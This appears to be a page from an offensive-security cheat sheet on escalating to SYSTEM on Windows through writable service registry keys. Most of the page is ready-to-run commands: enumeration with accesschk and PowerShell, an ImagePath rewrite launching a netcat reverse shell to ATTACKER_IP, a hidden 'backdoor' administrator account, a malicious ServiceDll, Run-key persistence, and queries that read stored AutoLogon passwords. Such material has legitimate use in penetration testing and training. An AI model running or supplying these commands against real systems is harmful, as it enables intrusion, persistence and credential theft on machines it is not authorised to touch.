Registry Permissions

Overview

Each Windows service has a registry key under HKLM\SYSTEM\CurrentControlSet\Services\. If you have write access to a service’s registry key, you can change its binary path, add parameters, or modify its configuration to execute arbitrary code as SYSTEM.

Find Writable Service Registry Keys

accesschk

accesschk.exe /accepteula -kvuqsw "Everyone" HKLM\SYSTEM\CurrentControlSet\Services
accesschk.exe /accepteula -kvuqsw "Users" HKLM\SYSTEM\CurrentControlSet\Services
accesschk.exe /accepteula -kvuqsw "Authenticated Users" HKLM\SYSTEM\CurrentControlSet\Services

Look for KEY_ALL_ACCESS or KEY_SET_VALUE.

PowerShell

Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Services" | ForEach-Object {
    $acl = Get-Acl $_.PSPath
    $acl.Access | Where-Object { $_.IdentityReference -match "Users|Everyone|Authenticated" -and $_.RegistryRights -match "SetValue|FullControl" } | ForEach-Object {
        Write-Output "$($_.IdentityReference) -> $($acl.PSPath)"
    }
}

Modify ImagePath

If writable, change the service binary:

reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /f

Restart service:

sc stop VulnService
sc start VulnService

Add Admin User via ImagePath

reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnService" /v ImagePath /t REG_EXPAND_SZ /d "cmd.exe /c net user backdoor P@ssw0rd /add && net localgroup administrators backdoor /add" /f
sc stop VulnService
sc start VulnService

Service DLL

Some services load a DLL specified in the registry:

reg query "HKLM\SYSTEM\CurrentControlSet\Services\VulnService\Parameters" /v ServiceDll

If ServiceDll key is writable:

reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\Temp\evil.dll" /f

AppendData Permission

If you have AppendData but not SetValue:

# Can add new subkeys but not modify existing values
reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnService\NewSubKey" /v Exploit /t REG_SZ /d "payload" /f

Limited, but can sometimes be chained with other techniques.

Startup Type

Change service to auto-start:

reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnService" /v Start /t REG_DWORD /d 2 /f

Value	Meaning
`2`	Automatic
`3`	Manual
`4`	Disabled

Other Interesting Registry Locations

Run Keys (Persistence)

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

If writable:

reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Windows\Temp\shell.exe" /f

Winlogon

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName

AutoLogon

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

Quick Reference

Target	Registry Path
Service binary	`HKLM\...\Services\<Name>\ImagePath`
Service DLL	`HKLM\...\Services\<Name>\Parameters\ServiceDll`
Startup type	`HKLM\...\Services\<Name>\Start`
Run keys	`HKLM\...\CurrentVersion\Run`
AutoLogon creds	`HKLM\...\Winlogon\DefaultPassword`

Documentation Index

​Overview

​Find Writable Service Registry Keys

​accesschk

​PowerShell

​Modify ImagePath

​Add Admin User via ImagePath

​Service DLL

​AppendData Permission

​Startup Type

​Other Interesting Registry Locations

​Run Keys (Persistence)

​Winlogon

​AutoLogon

​Quick Reference